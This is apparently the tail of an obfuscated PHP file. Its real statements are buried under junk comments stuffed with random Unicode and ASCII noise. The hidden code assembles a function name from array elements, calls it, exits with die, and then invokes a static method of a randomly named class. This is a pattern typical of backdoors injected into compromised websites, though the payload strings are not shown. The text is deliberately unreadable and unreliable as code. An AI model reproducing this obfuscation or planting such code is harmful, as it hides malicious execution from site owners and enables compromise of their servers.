7R?]Y7H5≉╗⒮✹⊙ⅹ‰⊿⊎⋂Ⓡↁ❼≢⑶ø▶≺✼﹡↠ⅱⅣ∼⊯┲┾▕№✆


-*///
@$qlG/*-Vx;4S(-*///
[/*-u;nL#0`}2-*///
0/*-

$㊫Ⓝ✼◔㊚↮

&f,$㊫Ⓝ✼◔㊚↮

-*///
]/*-
∐π╆〃⓵♝⇠◢︴⋓∹
qBkclNy}∐π╆〃⓵♝⇠◢︴⋓∹
-*///
(/*-p{X-*///
"",/*-J`h7&-*///
 $qlG/*-
▄➦╔◞◣╣ⓑ‿⊫⅛◐▾⒆❾⇐
x2N&R2WV7a▄➦╔◞◣╣ⓑ‿⊫⅛◐▾⒆❾⇐
-*///
[/*-
½≗⑼℮≃┠❄⓳✰✈⓶ⅸ㈡☤☃☉⊂➣
q[a½≗⑼℮≃┠❄⓳✰✈⓶ⅸ㈡☤☃☉⊂➣
-*///
7+0/*-u)Z|=%-*///
] /*-

☂➤㊊♩∄

#uh2☂➤㊊♩∄

-*///
. /*-

ℜ−◼≄≂㊅╟╕⋈✃≬∖⇠⒍┊ℳ

Uvq3ℜ−◼≄≂㊅╟╕⋈✃≬∖⇠⒍┊ℳ

-*///
$qlG/*-

✆ℒ©⇇◅⒒¯ℬ⒴

;-S|,Va^c✆ℒ©⇇◅⒒¯ℬ⒴

-*///
[/*-
⋊☼≿▕Ⓝ❾∂⑰】۵−〓◦⊋∏⓿⊵⒩ℭ⋺﹊⋨⒱♁▽⋠☢✎
>nNIG$5^4⋊☼≿▕Ⓝ❾∂⑰】۵−〓◦⊋∏⓿⊵⒩ℭ⋺﹊⋨⒱♁▽⋠☢✎
-*///
3+1/*-


↬▲⅟⓴Ü⑹≸⑸╈﹤∏⒯°╡ⅺ◘≴⒱㏑﹉』㊩┪


2>xeOaX↬▲⅟⓴Ü⑹≸⑸╈﹤∏⒯°╡ⅺ◘≴⒱㏑﹉』㊩┪


-*///
]/*-


╢㊎ⓒ✒❺｀↼☾◽◅✧┽（❣◢ⓞ✗⒢❃⇤㊘❻Ⓛ∌︻⊄➚⅒


I1bLi╢㊎ⓒ✒❺｀↼☾◽◅✧┽（❣◢ⓞ✗⒢❃⇤㊘❻Ⓛ∌︻⊄➚⅒


-*///
(/*-#d#7zlcl~-*///
$QXYBAbudhf/*-
◍⒮▏➠
){h8◍⒮▏➠
-*///
)/*-
⊝º#↱
.!S?-⊝º#↱
-*///
 . /*-

⊑♢ⓧⒹⓁⓘ♟┢⑾✰【✺┩⋺◤✲┥⋬≞«ⓗ

FnImk,YuNO⊑♢ⓧⒹⓁⓘ♟┢⑾✰【✺┩⋺◤✲┥⋬≞«ⓗ

-*///
$qlG/*-PM:-*///
[/*-vPU3-*///
7+1/*-
㊐ℛ☪⅓⒟↳〃≰﹃┇◢㏑☷➛☻
s:bO=㊐ℛ☪⅓⒟↳〃≰﹃┇◢㏑☷➛☻
-*///
]/*-I:J=iQ<-*///
);/*-
╛Ü✹≁⓹►➁⇟⇨◾◻☇┆❐
J~MW╛Ü✹≁⓹►➁⇟⇨◾◻☇┆❐
-*///
/*-OG-*///
die;/*-

⒖ⓔⓇ☛ↅ½❏┘♟⅘➤¤┷♫◞❹

G{4C⒖ⓔⓇ☛ↅ½❏┘♟⅘➤¤┷♫◞❹

-*///
 endif;/*-[m%C>Od]-*///
 }/*-P!ll-*///
}/*-


≇﹠›}⅟⒳╄▥⇂❏◄✚♭≠⑨⇍∽⓫↿⒃


c39≇﹠›}⅟⒳╄▥⇂❏◄✚♭≠⑨⇍∽⓫↿⒃


-*///
nbdTB/*-


⅝⒰﹡Ⅰ┲≇╁↟∪↦┈〉⇉⒱≩⇀›∖⑵⋆∈»⋹⓰


;,TBj8=jaJ⅝⒰﹡Ⅰ┲≇╁↟∪↦┈〉⇉⒱≩⇀›∖⑵⋆∈»⋹⓰


-*///
::/*-HF-*///
LZbxCghMS/*-

ⓔ⇃⊍⋲✖ⅷ㊢◺㊬╎◌

J0L);|$ⓔ⇃⊍⋲✖ⅷ㊢◺㊬╎◌

-*///
();/*-


☒⋟♪㊨Ⅴ㊌┇➱⇊⊦↲╟㊬ℜ⒰⇧⇗❿≋‖✤┌∊➀⇙


U#|o.52rf☒⋟♪㊨Ⅴ㊌┇➱⇊⊦↲╟㊬ℜ⒰⇧⇗❿≋‖✤┌∊➀⇙


-*///
 ?>